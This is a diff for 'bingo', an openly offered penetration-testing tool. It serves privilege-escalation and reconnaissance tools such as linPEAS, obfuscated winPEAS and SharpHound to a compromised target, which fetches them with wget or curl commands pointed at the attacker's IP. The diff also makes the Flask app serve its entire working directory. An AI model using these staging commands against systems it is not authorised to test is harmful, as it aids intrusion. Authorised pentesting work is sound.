[Snyk] Security upgrade werkzeug from 2.2.3 to 3.0.3

README.md

@@ -1 +1,37 @@
-# bingo
+# bingo - Penetration Testing Toolkit
+
+bingo facilitates the distribution and execution of essential tools for penetration testing, allowing the attacker to fetch them on the target machine without internet access on it.
+
+## Installation
+
+1. **Clone the Repository:**
+   ```bash
+   git clone https://github.com/luskabol/bingo.git
+   cd bingo
+
+2. **Install dependencies**
+    ```bash
+    pip install -r requirements.txt
+
+## Usage
+
+1. **On the attacker machine:**
+    ```bash
+    python3 bingo.py
+    ```
+
+2. **On the target machine:**
+    ```bash
+    wget http://{your-internal-IP}:8000/get/{binary-name} -O {path-to-output-file}
+    ```
+
+    **If the target doesn't have wget:**
+    ```bash
+    curl http://{your-internal-IP}:8000/get/{binary-name} -o {path-to-output-file}
+    ```
+
+- Replace {your-internal-IP} with the attacker's machine IP.
+
+- Replace {binary-name} with the name of the binary you want to get, check `bingo.yaml` for available binaries.
+
+- Replace {path-to-output-file} with the location where you want to save the binary.

bingo.py

@@ -18,7 +18,7 @@
         except yaml.YAMLError as exc:
             print(exc)
 
-app = Flask(__name__)
+app = Flask(__name__, static_url_path='', static_folder=os.getcwd())
 
 def search(parse, key_value):
     return parse[next((i for i,key in enumerate(parse) if key_value in key), None)].get(key_value)

bingo.yaml

@@ -1,10 +1,10 @@
 program:
   linpeas:
-    - url: "https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh"
+    - url: "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh"
     - type: script
     - os: linux
   winpeas:
-    - url: "https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases/winPEASany.exe"
+    - url: "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
     - type: binary
     - os: windows
   sharphound:

requirements.txt

@@ -1,3 +1,5 @@
 pyyaml
 flask
-
+requests
+netifaces
+werkzeug>=3.0.3 # not directly required, pinned by Snyk to avoid a vulnerability

todo.txt

@@ -1,3 +1 @@
-add a readme
 add more binaries
-create an instalation guide